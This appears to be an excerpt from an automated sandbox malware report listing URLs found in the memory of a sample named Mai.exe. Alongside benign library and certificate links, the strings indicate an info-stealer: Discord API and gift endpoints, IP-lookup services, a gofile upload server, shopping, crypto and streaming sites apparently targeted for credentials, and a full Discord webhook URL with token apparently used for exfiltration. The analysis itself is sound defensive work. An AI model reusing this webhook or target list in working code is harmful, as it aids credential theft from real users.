                  Source: Mai.exe, 00000004.00000002.2707357416.000001995DCB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/execX
                  Source: Mai.exe, 00000004.00000003.2377976414.000001995E3E6000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2115362009.000001995E3CD000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2103277216.000001995E3C2000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2715528744.000001995E3F7000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2281182162.000001995E3D9000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2402286590.000001995F1E2000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2283656673.000001995F1E0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2640304917.000001995E3F1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2187500147.000001995F1DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc4880
                  Source: Mai.exe, 00000004.00000002.2724335316.000001995FB90000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2724666844.000001995FBE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5297
                  Source: Mai.exe, 00000004.00000003.2187500147.000001995F2FB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2312508752.000001995F339000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2252890863.000001995F2FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5869
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
                  Source: Mai.exe, 00000004.00000003.2554277610.000001995F464000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2256955753.000001995F1A9000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2382446743.000001995F1B1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2722046903.000001995F464000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2245681829.000001995F19D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2471562987.000001995F464000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2321410286.000001995F464000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2085371455.000001995F19D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289950600.000001995F464000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
                  Source: Mai.exe, 00000004.00000003.2084631767.000001995F4A1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2133333621.000001995F4B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
                  Source: Mai.exe, 00000004.00000003.2084857083.000001995F489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
                  Source: Mai.exe, 00000004.00000003.2084631767.000001995F4A1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2133333621.000001995F4B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
                  Source: Mai.exe, 00000004.00000003.2084631767.000001995F4A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
                  Source: Mai.exe, 00000004.00000003.2084631767.000001995F4A1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2133333621.000001995F4B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
                  Source: Mai.exe, 00000004.00000003.2084631767.000001995F4A1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2133333621.000001995F4B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
                  Source: Mai.exe, 00000004.00000002.2719934245.000001995ED50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
                  Source: Mai.exe, 00000004.00000003.2204552245.000001995F4DA000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2084631767.000001995F4A1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2085048419.000001995F4BC000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2204632854.000001995F4E0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2085109796.000001995F4CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
                  Source: Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/-
                  Source: Mai.exe, 00000004.00000003.1540360354.000001995E36E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
                  Source: Mai.exe, 00000004.00000003.2229794831.000001995F0B3000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2115362009.000001995E3CD000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2090188958.000001995F08B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2103277216.000001995E3C2000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2281182162.000001995E3D9000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2277018993.000001995F0BE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2298258374.000001995F0C9000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2349801232.000001995F0CE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2459478257.000001995E3DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
                  Source: Mai.exe, 00000004.00000002.2724335316.000001995FB20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.dabeaz.com/ply)
                  Source: Mai.exe, 00000002.00000003.1472086340.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1472720577.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471062686.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1473163789.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1470937814.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471598606.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                  Source: Mai.exe, 00000004.00000002.2707419898.000001995DCCB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2207794122.000001995E5EE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2276777299.000001995E5EE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718201292.000001995E611000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2379937424.000001995E60D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2460640379.000001995DCC3000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2296012741.000001995E5EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
                  Source: Mai.exe, 00000004.00000003.2229475419.000001995E500000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2115362009.000001995E49A000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1552591972.000001995E49A000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2167480812.000001995E4C4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2242126610.000001995E503000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2136590998.000001995E4BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                  Source: Mai.exe, 00000004.00000003.1540933860.000001995E361000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
                  Source: Mai.exe, 00000004.00000003.1540360354.000001995E36E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
                  Source: Mai.exe, 00000004.00000003.2321410286.000001995F46C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2554277610.000001995F46C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289950600.000001995F46C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2471562987.000001995F46C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2588079315.000001995F484000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
                  Source: Mai.exe, 00000004.00000003.2187500147.000001995F2FB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2312508752.000001995F339000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2252890863.000001995F2FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                  Source: Mai.exe, 00000004.00000003.2554277610.000001995F464000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2256955753.000001995F1A9000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2382446743.000001995F1B1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2722046903.000001995F464000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2245681829.000001995F19D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2471562987.000001995F464000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2321410286.000001995F464000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2085371455.000001995F19D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289950600.000001995F464000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rfc-editor.org/info/rfc7253
                  Source: Mai.exe, 00000004.00000003.2299331303.000001995F373000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289950600.000001995F3E1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2294320658.000001995F361000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2085371455.000001995F354000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2324667603.000001995F374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
                  Source: Mai.exe, 00000004.00000003.2430683821.000001995F073000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1554271336.000001995F1CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://aliexpress.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aliexpress.com)z&
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://amazon.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazon.com)z
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServerr
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.orgr
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://binance.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://binance.com)z
                  Source: Mai.exe, 00000004.00000002.2718989506.000001995E720000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2719111296.000001995E820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue44497.
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/avatars/
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/avatars/r$
                  Source: Mai.exe, Mai.exe, 00000004.00000002.2727243281.00007FFBA457C000.00000002.00000001.01000000.00000024.sdmpString found in binary or memory: https://cffi.readthedocs.io/en/latest/using.html#callbacks
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://checkip.amazonaws.com
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://checkip.amazonaws.coml
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkip.amazonaws.comz
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://coinbase.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://coinbase.com)z
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crunchyroll.com)
                  Source: Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crunchyroll.com)z
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com)z
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/users/
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v6/guilds/
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v6/guilds/-1.dll
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v6/guilds/r
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v6/users/
                  Source: Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                  Source: Mai.exe, 00000004.00000002.2719934245.000001995ED50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1258069699774906413/e-hqRvwqHXL2f7YpIVUE6bKm7MAIquuDvncT3SZ5L7vnNYS
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.gg/
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.gg/r
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2719934245.000001995ED50000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.gift/
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v6/users/
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://disney.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disney.com)z$
                  Source: Mai.exe, 00000004.00000003.1548165458.000001995E077000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2208933769.000001995DF89000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2204751911.000001995DF65000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1541731901.000001995E077000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2227171262.000001995E065000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1545270960.000001995E077000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2225151854.000001995DFFB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2247616159.000001995E067000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2285064272.000001995E0DB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2177784313.000001995DF36000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2282469085.000001995E0B4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2223311860.000001995DFF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
                  Source: Mai.exe, 00000004.00000003.2208933769.000001995DF89000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2204751911.000001995DF65000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2252092172.000001995DFFC000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1548165458.000001995DFAD000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1536553084.000001995E01D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2225151854.000001995DFFB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2605770097.000001995E02A000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1540473126.000001995E01D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1545270960.000001995E01D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2302459753.000001995E01E000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2177784313.000001995DF36000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1541731901.000001995E01D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2223311860.000001995DFF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/multiprocessing.html
                  Source: Mai.exe, 00000004.00000002.2724125652.000001995F980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/socket.html#socket.socket.connect_ex
                  Source: Mai.exe, 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ebay.com)
                  Source: Mai.exe, 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2421218915.000001995E6D1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ebay.com)z$
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://epicgames.com)
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://expressvpn.com)
